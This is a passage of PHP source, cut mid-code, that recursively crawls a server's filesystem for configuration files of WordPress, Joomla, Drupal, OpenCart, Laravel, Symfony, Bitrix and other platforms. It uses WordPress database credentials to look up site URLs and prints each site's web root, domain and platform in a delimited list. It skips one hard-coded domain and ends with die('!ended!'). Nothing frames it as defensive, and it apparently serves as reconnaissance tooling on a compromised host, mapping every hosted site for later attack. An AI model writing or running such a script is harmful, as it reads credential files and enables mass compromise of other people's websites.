connect_errno) { if ($result = $mysqli->query("SELECT option_value FROM {$table_prefix}options WHERE option_name = 'siteurl';")) { $row = $result->fetch_object(); $result->close(); $p = dirname($p); $d = is_valid_domain($row->option_value); if ($d) { print "{$p}@@@{$d}@@@wp@@@{$p}\n"; } } $mysqli->close(); } } function scan_joomla($p) { $c = file_get_contents($p); preg_match("/live_site = '(.*?)';/", $c, $m); if (isset($m[1])) { $p = dirname($p); $d = is_valid_domain($m[1]); if ($d) { print "{$p}@@@{$d}@@@joomla@@@{$p}\n"; } } } function scan_drupal($p) { $c = file_get_contents($p); if (preg_match("/\\\$base_url\s*=\s*['\"]([^'\"]+)['\"]/", $c, $m)) { $p = dirname($p); $d = is_valid_domain($m[1]); if ($d) { print "{$p}@@@{$d}@@@drupal@@@{$p}\n"; } } } function scan_opencart($p) { $c = file_get_contents($p); $d = null; if (preg_match("/define\s*\(\s*['\"]HTTPS_SERVER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $c, $m)) { $d = is_valid_domain($m[1]); } if (!$d && preg_match("/define\s*\(\s*['\"]HTTP_SERVER['\"]\s*,\s*['\"]([^'\"]+)['\"]\s*\)/", $c, $m)) { $d = is_valid_domain($m[1]); } if ($d) { $p = dirname($p); print "{$p}@@@{$d}@@@opencart@@@{$p}\n"; } } function scan_laravel($p) { $c = @file_get_contents($p); if (!$c) return; if (preg_match("/^\s*APP_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m)) { $path_root = dirname($p); if (!@is_file($path_root . '/artisan')) return; $path_public = $path_root . '/public'; if (!@is_dir($path_public)) { $path_public = $path_root; } $d = is_valid_domain($m[1]); if ($d) { print "{$path_public}@@@{$d}@@@laravel@@@{$p}\n"; } } } function scan_codeigniter3($p) { $c = @file_get_contents($p); if (!$c) return; if (preg_match("/\\\$config\s*\[\s*['\"]base_url['\"]\s*\]\s*=\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) { $path_root = dirname(dirname($p)); $d = is_valid_domain($m[1]); if ($d) { print "{$path_root}@@@{$d}@@@codeigniter3@@@{$p}\n"; } } } function scan_codeigniter4($p) { $c = @file_get_contents($p); if (!$c) return; if (preg_match("/\\\$baseURL\s*=\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) { $path_root = dirname(dirname(dirname($p))); $path_public = $path_root . '/public'; if (!@is_dir($path_public)) { $path_public = $path_root; } $d = is_valid_domain($m[1]); if ($d) { print "{$path_public}@@@{$d}@@@codeigniter4@@@{$p}\n"; } } } function scan_cakephp($p) { $c = @file_get_contents($p); if (!$c) return; if (preg_match("/['\"]fullBaseUrl['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m) || preg_match("/['\"]fullBaseUrl['\"]\s*=>\s*env\s*\(\s*['\"][^'\"]+['\"]\s*,\s*['\"](https?:\/\/[^'\"]+)['\"]\s*\)/", $c, $m)) { $path_root = dirname($p); $path_webroot = $path_root . '/webroot'; if (!@is_dir($path_webroot)) { $path_webroot = $path_root; } $d = is_valid_domain($m[1]); if ($d) { print "{$path_webroot}@@@{$d}@@@cakephp@@@{$p}\n"; } } } function scan_symfony($p) { $c = @file_get_contents($p); if (!$c) return; if (preg_match("/^\s*APP_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m) || preg_match("/^\s*PUBLIC_URL\s*=\s*['\"]?(https?:\/\/[^'\"]+)['\"]?/m", $c, $m)) { $path_root = dirname($p); if (!@is_file($path_root . '/bin/console')) return; $path_public = $path_root . '/public'; if (@is_dir($path_public)) { $path_out = $path_public; } else { $path_web = $path_root . '/web'; $path_out = @is_dir($path_web) ? $path_web : $path_root; } $d = is_valid_domain($m[1]); if ($d) { print "{$path_out}@@@{$d}@@@symfony@@@{$p}\n"; } } } function scan_kohana($p) { $c = @file_get_contents($p); if (!$c) return; if (preg_match("/['\"]base_url['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) { $path_root = (strpos($p, 'application/') !== false) ? dirname(dirname($p)) : dirname($p); $d = is_valid_domain($m[1]); if ($d) { print "{$path_root}@@@{$d}@@@kohana@@@{$p}\n"; } } } function scan_fuelphp($p) { $c = @file_get_contents($p); if (!$c) return; if (preg_match("/['\"]base_url['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) { $path_fuel = dirname(dirname($p)); $path_root = dirname($path_fuel); $path_public = $path_root . '/public'; if (!@is_dir($path_public)) { $path_public = $path_root; } $d = is_valid_domain($m[1]); if ($d) { print "{$path_public}@@@{$d}@@@fuelphp@@@{$p}\n"; } } } function scan_bitrix($p) { $c = @file_get_contents($p); if (!$c || strpos($p, 'bitrix') === false) return; if (preg_match("/['\"]value['\"]\s*=>\s*['\"](https?:\/\/[^'\"]+)['\"]/", $c, $m)) { $path_root = dirname(dirname($p)); $d = is_valid_domain($m[1]); if ($d) { print "{$path_root}@@@{$d}@@@bitrix@@@{$p}\n"; } } } function scan($path) { $existed = ["curtumepanorama.com.br"]; if ($dir = @opendir($path)) { while (false !== ($file = readdir($dir))) { if ($path === '/' || $path === '') { $p = $path . $file; } else { $p = $path . '/' . $file; } if ($file != '.' && $file != '..') { $found = false; foreach ($existed as $domain) { if (strstr($p, $domain)) { $found = true; break; } } if ($found) { continue; } if (is_link($p)) { continue; } elseif (is_dir($p)) { scan($p); } elseif ($file == 'wp-config.php') { scan_wp($p); } elseif ($file == 'configuration.php') { scan_joomla($p); } elseif ($file == 'settings.php' && (strpos($p, 'sites/') !== false || strpos($p, 'sites\\') !== false)) { scan_drupal($p); } elseif ($file == 'config.php' && strpos(@file_get_contents($p), 'HTTP_SERVER') !== false) { scan_opencart($p); } elseif ($file == '.settings.php' && strpos($p, 'bitrix') !== false) { scan_bitrix($p); } elseif ($file == '.env') { scan_laravel($p); scan_symfony($p); } elseif ($file == 'config.php' && strpos($p, 'application/config') !== false) { scan_codeigniter3($p); } elseif ($file == 'App.php' && strpos($p, 'app/Config') !== false) { scan_codeigniter4($p); } elseif ($file == 'app.php' && strpos($p, 'config/') !== false) { scan_cakephp($p); } elseif (($file == 'bootstrap.php' || $file == 'url.php') && strpos($p, 'application/') !== false) { scan_kohana($p); } elseif ($file == 'config.php' && strpos($p, 'fuel/') !== false) { scan_fuelphp($p); } elseif ($file == 'config.php' && strpos(@file_get_contents($p), 'HTTP_SERVER') !== false) { scan_opencart($p); } } } } } scan($r); die('!ended!');